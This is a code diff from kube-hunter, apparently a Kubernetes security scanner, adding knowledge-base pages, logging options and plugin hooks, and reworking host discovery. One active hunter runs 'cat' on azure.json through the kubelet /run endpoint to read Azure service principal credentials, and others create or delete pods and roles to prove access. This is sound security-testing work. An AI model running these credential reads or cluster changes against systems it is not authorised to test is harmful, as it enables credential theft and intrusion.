# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
|
||||
|
||||
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
|
||||
|
||||
Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.
|
||||
|
||||
## Remediation
|
||||
|
||||
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
|
||||
|
||||
Minimize the use of privileged containers.
|
||||
|
||||
Use Pod Security Policies to enforce using `privileged: false` policy.
|
||||
|
||||
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
|
||||
|
||||
Ensure node(s) runs active filesystem monitoring.
|
||||
|
||||
Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
|
||||
|
||||
Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
|
||||
|
||||
## References
|
||||
|
||||
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
|
||||
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
|
||||
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
|
||||
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
|
||||
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
|
||||
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
|
||||
23
docs/_kb/KHV052.md
Normal file
23
docs/_kb/KHV052.md
Normal file
@@ -0,0 +1,23 @@
|
||||
---
|
||||
vid: KHV052
|
||||
title: Exposed Pods
|
||||
categories: [Information Disclosure]
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
An attacker could view sensitive information about pods that are bound to a Node using the exposed /pods endpoint
|
||||
This can be done either by accessing the readonly port (default 10255), or from the secure kubelet port (10250)
|
||||
|
||||
## Remediation
|
||||
|
||||
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
|
||||
|
||||
Disable the readonly port by using `--read-only-port=0` kubelet flag.
|
||||
|
||||
## References
|
||||
|
||||
- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
|
||||
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
|
||||
9
job.yaml
9
job.yaml
@@ -1,3 +1,4 @@
|
||||
---
|
||||
apiVersion: batch/v1
|
||||
kind: Job
|
||||
metadata:
|
||||
@@ -6,9 +7,9 @@ spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: kube-hunter
|
||||
image: aquasec/kube-hunter
|
||||
command: ["python", "kube-hunter.py"]
|
||||
args: ["--pod"]
|
||||
- name: kube-hunter
|
||||
image: aquasec/kube-hunter
|
||||
command: ["kube-hunter"]
|
||||
args: ["--pod"]
|
||||
restartPolicy: Never
|
||||
backoffLimit: 4
|
||||
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 144 KiB After Width: | Height: | Size: 230 KiB |
BIN
kube-hunter.png
BIN
kube-hunter.png
Binary file not shown.
|
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 19 KiB |
@@ -8,12 +8,17 @@ from kube_hunter.conf import Config, set_config
|
||||
from kube_hunter.conf.parser import parse_args
|
||||
from kube_hunter.conf.logging import setup_logger
|
||||
|
||||
args = parse_args()
|
||||
from kube_hunter.plugins import initialize_plugin_manager
|
||||
|
||||
pm = initialize_plugin_manager()
|
||||
# Using a plugin hook for adding arguments before parsing
|
||||
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
|
||||
config = Config(
|
||||
active=args.active,
|
||||
cidr=args.cidr,
|
||||
include_patched_versions=args.include_patched_versions,
|
||||
interface=args.interface,
|
||||
log_file=args.log_file,
|
||||
mapping=args.mapping,
|
||||
network_timeout=args.network_timeout,
|
||||
pod=args.pod,
|
||||
@@ -21,9 +26,12 @@ config = Config(
|
||||
remote=args.remote,
|
||||
statistics=args.statistics,
|
||||
)
|
||||
setup_logger(args.log)
|
||||
setup_logger(args.log, args.log_file)
|
||||
set_config(config)
|
||||
|
||||
# Running all other registered plugins before execution
|
||||
pm.hook.load_plugin(args=args)
|
||||
|
||||
from kube_hunter.core.events import handler
|
||||
from kube_hunter.core.events.types import HuntFinished, HuntStarted
|
||||
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
|
||||
@@ -65,13 +73,13 @@ def list_hunters():
|
||||
print("\nPassive Hunters:\n----------------")
|
||||
for hunter, docs in handler.passive_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
print("* {}\n {}\n".format(name, doc))
|
||||
print(f"* {name}\n {doc}\n")
|
||||
|
||||
if config.active:
|
||||
print("\n\nActive Hunters:\n---------------")
|
||||
for hunter, docs in handler.active_hunters.items():
|
||||
name, doc = hunter.parse_docs(docs)
|
||||
print("* {}\n {}\n".format(name, doc))
|
||||
print(f"* {name}\n {doc}\n")
|
||||
|
||||
|
||||
hunt_started_lock = threading.Lock()
|
||||
|
||||
@@ -4,7 +4,7 @@ from typing import Any, Optional
|
||||
|
||||
@dataclass
|
||||
class Config:
|
||||
""" Config is a configuration container.
|
||||
"""Config is a configuration container.
|
||||
It contains the following fields:
|
||||
- active: Enable active hunters
|
||||
- cidr: Network subnets to scan
|
||||
@@ -13,6 +13,7 @@ class Config:
|
||||
- interface: Interface scanning mode
|
||||
- list_hunters: Print a list of existing hunters
|
||||
- log_level: Log level
|
||||
- log_file: Log File path
|
||||
- mapping: Report only found components
|
||||
- network_timeout: Timeout for network operations
|
||||
- pod: From pod scanning mode
|
||||
@@ -27,6 +28,7 @@ class Config:
|
||||
dispatcher: Optional[Any] = None
|
||||
include_patched_versions: bool = False
|
||||
interface: bool = False
|
||||
log_file: Optional[str] = None
|
||||
mapping: bool = False
|
||||
network_timeout: float = 5.0
|
||||
pod: bool = False
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
import logging
|
||||
|
||||
|
||||
DEFAULT_LEVEL = logging.INFO
|
||||
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
|
||||
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
|
||||
@@ -10,7 +9,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.CRITICAL)
|
||||
logging.getLogger("scapy.loading").setLevel(logging.CRITICAL)
|
||||
|
||||
|
||||
def setup_logger(level_name):
|
||||
def setup_logger(level_name, logfile):
|
||||
# Remove any existing handlers
|
||||
# Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
|
||||
for h in logging.getLogger().handlers[:]:
|
||||
@@ -22,6 +21,9 @@ def setup_logger(level_name):
|
||||
else:
|
||||
log_level = getattr(logging, level_name.upper(), None)
|
||||
log_level = log_level if isinstance(log_level, int) else None
|
||||
logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
|
||||
if logfile is None:
|
||||
logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
|
||||
else:
|
||||
logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
|
||||
if not log_level:
|
||||
logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
|
||||
|
||||
@@ -1,11 +1,17 @@
|
||||
from argparse import ArgumentParser
|
||||
from kube_hunter.plugins import hookimpl
|
||||
|
||||
|
||||
def parse_args():
|
||||
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
|
||||
|
||||
@hookimpl
|
||||
def parser_add_arguments(parser):
|
||||
"""
|
||||
This is the default hook implementation for parse_add_argument
|
||||
Contains initialization for all default arguments
|
||||
"""
|
||||
parser.add_argument(
|
||||
"--list", action="store_true", help="Displays all tests in kubehunter (add --active flag to see active tests)",
|
||||
"--list",
|
||||
action="store_true",
|
||||
help="Displays all tests in kubehunter (add --active flag to see active tests)",
|
||||
)
|
||||
|
||||
parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
|
||||
@@ -15,7 +21,9 @@ def parse_args():
|
||||
parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
|
||||
|
||||
parser.add_argument(
|
||||
"--include-patched-versions", action="store_true", help="Don't skip patched versions when scanning",
|
||||
"--include-patched-versions",
|
||||
action="store_true",
|
||||
help="Don't skip patched versions when scanning",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
@@ -25,11 +33,17 @@ def parse_args():
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--mapping", action="store_true", help="Outputs only a mapping of the cluster's nodes",
|
||||
"--mapping",
|
||||
action="store_true",
|
||||
help="Outputs only a mapping of the cluster's nodes",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--remote", nargs="+", metavar="HOST", default=list(), help="One or more remote ip/dns to hunt",
|
||||
"--remote",
|
||||
nargs="+",
|
||||
metavar="HOST",
|
||||
default=list(),
|
||||
help="One or more remote ip/dns to hunt",
|
||||
)
|
||||
|
||||
parser.add_argument("--active", action="store_true", help="Enables active hunting")
|
||||
@@ -43,7 +57,17 @@ def parse_args():
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--report", type=str, default="plain", help="Set report type, options are: plain, yaml, json",
|
||||
"--log-file",
|
||||
type=str,
|
||||
default=None,
|
||||
help="Path to a log file to output all logs to",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--report",
|
||||
type=str,
|
||||
default="plain",
|
||||
help="Set report type, options are: plain, yaml, json",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
@@ -59,6 +83,18 @@ def parse_args():
|
||||
|
||||
parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
|
||||
|
||||
|
||||
def parse_args(add_args_hook):
|
||||
"""
|
||||
Function handles all argument parsing
|
||||
|
||||
@param add_arguments: hook for adding arguments to it's given ArgumentParser parameter
|
||||
@return: parsed arguments dict
|
||||
"""
|
||||
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
|
||||
# adding all arguments to the parser
|
||||
add_args_hook(parser=parser)
|
||||
|
||||
args = parser.parse_args()
|
||||
if args.cidr:
|
||||
args.cidr = args.cidr.replace(" ", "").split(",")
|
||||
|
||||
@@ -14,7 +14,7 @@ logger = logging.getLogger(__name__)
|
||||
# Inherits Queue object, handles events asynchronously
|
||||
class EventQueue(Queue):
|
||||
def __init__(self, num_worker=10):
|
||||
super(EventQueue, self).__init__()
|
||||
super().__init__()
|
||||
self.passive_hunters = dict()
|
||||
self.active_hunters = dict()
|
||||
self.all_hunters = dict()
|
||||
|
||||
@@ -144,7 +144,8 @@ class NewHostEvent(Event):
|
||||
logger.debug("Checking whether the cluster is deployed on azure's cloud")
|
||||
# Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
|
||||
result = requests.get(
|
||||
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}", timeout=config.network_timeout,
|
||||
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
return result["cloud"] or "NoCloud"
|
||||
except requests.ConnectionError:
|
||||
@@ -194,7 +195,11 @@ class K8sVersionDisclosure(Vulnerability, Event):
|
||||
|
||||
def __init__(self, version, from_endpoint, extra_info=""):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "K8s Version Disclosure", category=InformationDisclosure, vid="KHV002",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"K8s Version Disclosure",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV002",
|
||||
)
|
||||
self.version = version
|
||||
self.from_endpoint = from_endpoint
|
||||
|
||||
@@ -5,8 +5,7 @@ import requests
|
||||
|
||||
from enum import Enum
|
||||
from netaddr import IPNetwork, IPAddress, AddrFormatError
|
||||
from netifaces import AF_INET, ifaddresses, interfaces
|
||||
from scapy.all import ICMP, IP, Ether, srp1
|
||||
from netifaces import AF_INET, ifaddresses, interfaces, gateways
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events import handler
|
||||
@@ -37,7 +36,7 @@ class RunningAsPodEvent(Event):
|
||||
try:
|
||||
with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
|
||||
return f.read()
|
||||
except IOError:
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
@@ -46,10 +45,14 @@ class AzureMetadataApi(Vulnerability, Event):
|
||||
|
||||
def __init__(self, cidr):
|
||||
Vulnerability.__init__(
|
||||
self, Azure, "Azure Metadata Exposure", category=InformationDisclosure, vid="KHV003",
|
||||
self,
|
||||
Azure,
|
||||
"Azure Metadata Exposure",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV003",
|
||||
)
|
||||
self.cidr = cidr
|
||||
self.evidence = "cidr: {}".format(cidr)
|
||||
self.evidence = f"cidr: {cidr}"
|
||||
|
||||
|
||||
class HostScanEvent(Event):
|
||||
@@ -105,7 +108,7 @@ class FromPodHostDiscovery(Discovery):
|
||||
if self.is_azure_pod():
|
||||
subnets, cloud = self.azure_metadata_discovery()
|
||||
else:
|
||||
subnets = self.traceroute_discovery()
|
||||
subnets = self.gateway_discovery()
|
||||
|
||||
should_scan_apiserver = False
|
||||
if self.event.kubeservicehost:
|
||||
@@ -137,12 +140,9 @@ class FromPodHostDiscovery(Discovery):
|
||||
return False
|
||||
|
||||
# for pod scanning
|
||||
def traceroute_discovery(self):
|
||||
config = get_config()
|
||||
node_internal_ip = srp1(
|
||||
Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout,
|
||||
)[IP].src
|
||||
return [[node_internal_ip, "24"]]
|
||||
def gateway_discovery(self):
|
||||
""" Retrieving default gateway of pod, which is usually also a contact point with the host """
|
||||
return [[gateways()["default"][AF_INET][0], "24"]]
|
||||
|
||||
# querying azure's interface metadata api | works only from a pod
|
||||
def azure_metadata_discovery(self):
|
||||
|
||||
@@ -1,9 +1,10 @@
|
||||
import os
|
||||
import json
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedRunHandler
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
|
||||
from kube_hunter.core.events import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability
|
||||
from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure
|
||||
@@ -14,14 +15,19 @@ logger = logging.getLogger(__name__)
|
||||
class AzureSpnExposure(Vulnerability, Event):
|
||||
"""The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
|
||||
|
||||
def __init__(self, container):
|
||||
def __init__(self, container, evidence=""):
|
||||
Vulnerability.__init__(
|
||||
self, Azure, "Azure SPN Exposure", category=IdentityTheft, vid="KHV004",
|
||||
self,
|
||||
Azure,
|
||||
"Azure SPN Exposure",
|
||||
category=IdentityTheft,
|
||||
vid="KHV004",
|
||||
)
|
||||
self.container = container
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
@handler.subscribe(ExposedRunHandler, predicate=lambda x: x.cloud == "Azure")
|
||||
@handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
|
||||
class AzureSpnHunter(Hunter):
|
||||
"""AKS Hunting
|
||||
Hunting Azure cluster deployments using specific known configurations
|
||||
@@ -33,30 +39,33 @@ class AzureSpnHunter(Hunter):
|
||||
|
||||
# getting a container that has access to the azure.json file
|
||||
def get_key_container(self):
|
||||
config = get_config()
|
||||
endpoint = f"{self.base_url}/pods"
|
||||
logger.debug("Trying to find container with access to azure.json file")
|
||||
try:
|
||||
r = requests.get(endpoint, verify=False, timeout=config.network_timeout)
|
||||
except requests.Timeout:
|
||||
logger.debug("failed getting pod info")
|
||||
else:
|
||||
pods_data = r.json().get("items", [])
|
||||
for pod_data in pods_data:
|
||||
for container in pod_data["spec"]["containers"]:
|
||||
for mount in container["volumeMounts"]:
|
||||
path = mount["mountPath"]
|
||||
if "/etc/kubernetes/azure.json".startswith(path):
|
||||
return {
|
||||
"name": container["name"],
|
||||
"pod": pod_data["metadata"]["name"],
|
||||
"namespace": pod_data["metadata"]["namespace"],
|
||||
}
|
||||
|
||||
# pods are saved in the previous event object
|
||||
pods_data = self.event.pods
|
||||
|
||||
suspicious_volume_names = []
|
||||
for pod_data in pods_data:
|
||||
for volume in pod_data["spec"].get("volumes", []):
|
||||
if volume.get("hostPath"):
|
||||
path = volume["hostPath"]["path"]
|
||||
if "/etc/kubernetes/azure.json".startswith(path):
|
||||
suspicious_volume_names.append(volume["name"])
|
||||
for container in pod_data["spec"]["containers"]:
|
||||
for mount in container.get("volumeMounts", []):
|
||||
if mount["name"] in suspicious_volume_names:
|
||||
return {
|
||||
"name": container["name"],
|
||||
"pod": pod_data["metadata"]["name"],
|
||||
"namespace": pod_data["metadata"]["namespace"],
|
||||
"mount": mount,
|
||||
}
|
||||
|
||||
def execute(self):
|
||||
container = self.get_key_container()
|
||||
if container:
|
||||
self.publish_event(AzureSpnExposure(container=container))
|
||||
evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
|
||||
self.publish_event(AzureSpnExposure(container=container, evidence=evidence))
|
||||
|
||||
|
||||
@handler.subscribe(AzureSpnExposure)
|
||||
@@ -69,14 +78,42 @@ class ProveAzureSpnExposure(ActiveHunter):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:{self.event.port}"
|
||||
|
||||
def test_run_capability(self):
|
||||
"""
|
||||
Uses SecureKubeletPortHunter to test the /run handler
|
||||
TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
|
||||
"""
|
||||
debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
|
||||
return debug_handlers.test_run_container()
|
||||
|
||||
def run(self, command, container):
|
||||
config = get_config()
|
||||
run_url = "/".join(self.base_url, "run", container["namespace"], container["pod"], container["name"])
|
||||
return requests.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
|
||||
run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
|
||||
return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
|
||||
|
||||
def get_full_path_to_azure_file(self):
|
||||
"""
|
||||
Returns a full path to /etc/kubernetes/azure.json
|
||||
Taking into consideration the difference folder of the mount inside the container.
|
||||
TODO: implement the edge case where the mount is to parent /etc folder.
|
||||
"""
|
||||
azure_file_path = self.event.container["mount"]["mountPath"]
|
||||
|
||||
# taking care of cases where a subPath is added to map the specific file
|
||||
if not azure_file_path.endswith("azure.json"):
|
||||
azure_file_path = os.path.join(azure_file_path, "azure.json")
|
||||
|
||||
return azure_file_path
|
||||
|
||||
def execute(self):
|
||||
if not self.test_run_capability():
|
||||
logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
|
||||
return
|
||||
|
||||
try:
|
||||
subscription = self.run("cat /etc/kubernetes/azure.json", container=self.event.container).json()
|
||||
azure_file_path = self.get_full_path_to_azure_file()
|
||||
logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
|
||||
subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
|
||||
except requests.Timeout:
|
||||
logger.debug("failed to run command in container", exc_info=True)
|
||||
except json.decoder.JSONDecodeError:
|
||||
|
||||
@@ -29,7 +29,11 @@ class ServerApiAccess(Vulnerability, Event):
|
||||
name = "Unauthenticated access to API"
|
||||
category = UnauthenticatedAccess
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=category, vid="KHV005",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV005",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -42,19 +46,30 @@ class ServerApiHTTPAccess(Vulnerability, Event):
|
||||
name = "Insecure (HTTP) access to API"
|
||||
category = UnauthenticatedAccess
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=category, vid="KHV006",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV006",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ApiInfoDisclosure(Vulnerability, Event):
|
||||
"""Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""
|
||||
|
||||
def __init__(self, evidence, using_token, name):
|
||||
category = InformationDisclosure
|
||||
if using_token:
|
||||
name += " using service account token"
|
||||
name += " using default service account token"
|
||||
else:
|
||||
name += " as anonymous user"
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=InformationDisclosure, vid="KHV007",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV007",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -89,12 +104,14 @@ class ListClusterRoles(ApiInfoDisclosure):
|
||||
|
||||
class CreateANamespace(Vulnerability, Event):
|
||||
|
||||
""" Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in.
|
||||
"""
|
||||
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created a namespace", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a namespace",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -105,14 +122,17 @@ class DeleteANamespace(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Delete a namespace", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Delete a namespace",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateARole(Vulnerability, Event):
|
||||
""" Creating a role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
within the specified namespaces.
|
||||
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
within the specified namespaces.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
@@ -121,37 +141,46 @@ class CreateARole(Vulnerability, Event):
|
||||
|
||||
|
||||
class CreateAClusterRole(Vulnerability, Event):
|
||||
""" Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
across the whole cluster
|
||||
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
across the whole cluster
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchARole(Vulnerability, Event):
|
||||
""" Patching a role might give an attacker the option to create new pods with custom roles within the
|
||||
"""Patching a role might give an attacker the option to create new pods with custom roles within the
|
||||
specific role's namespace scope
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Patched a role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchAClusterRole(Vulnerability, Event):
|
||||
""" Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
|
||||
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
|
||||
cluster scope.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Patched a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -161,7 +190,10 @@ class DeleteARole(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Deleted a role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -171,7 +203,10 @@ class DeleteAClusterRole(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Deleted a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -181,7 +216,10 @@ class CreateAPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created A Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -191,7 +229,10 @@ class CreateAPrivilegedPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created A PRIVILEGED Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A PRIVILEGED Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -201,7 +242,10 @@ class PatchAPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Patched A Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched A Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -211,7 +255,10 @@ class DeleteAPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Deleted A Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted A Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -225,7 +272,7 @@ class ApiServerPassiveHunterFinished(Event):
|
||||
# If we have a service account token we'll also trigger AccessApiServerWithToken below
|
||||
@handler.subscribe(ApiServer)
|
||||
class AccessApiServer(Hunter):
|
||||
""" API Server Hunter
|
||||
"""API Server Hunter
|
||||
Checks if API server is accessible
|
||||
"""
|
||||
|
||||
@@ -268,7 +315,10 @@ class AccessApiServer(Hunter):
|
||||
try:
|
||||
if not namespace:
|
||||
r = requests.get(
|
||||
f"{self.path}/api/v1/pods", headers=self.headers, verify=False, timeout=config.network_timeout,
|
||||
f"{self.path}/api/v1/pods",
|
||||
headers=self.headers,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
else:
|
||||
r = requests.get(
|
||||
@@ -296,7 +346,7 @@ class AccessApiServer(Hunter):
|
||||
else:
|
||||
self.publish_event(ServerApiAccess(api, self.with_token))
|
||||
|
||||
namespaces = self.get_items("{path}/api/v1/namespaces".format(path=self.path))
|
||||
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
|
||||
if namespaces:
|
||||
self.publish_event(ListNamespaces(namespaces, self.with_token))
|
||||
|
||||
@@ -319,12 +369,12 @@ class AccessApiServer(Hunter):
|
||||
|
||||
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
|
||||
class AccessApiServerWithToken(AccessApiServer):
|
||||
""" API Server Hunter
|
||||
"""API Server Hunter
|
||||
Accessing the API server using the service account token obtained from a compromised pod
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
super(AccessApiServerWithToken, self).__init__(event)
|
||||
super().__init__(event)
|
||||
assert self.event.auth_token
|
||||
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
|
||||
self.category = InformationDisclosure
|
||||
@@ -411,7 +461,8 @@ class AccessApiServerActive(ActiveHunter):
|
||||
def patch_a_pod(self, namespace, pod_name):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}", data=json.dumps(data),
|
||||
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def create_namespace(self):
|
||||
@@ -438,7 +489,8 @@ class AccessApiServerActive(ActiveHunter):
|
||||
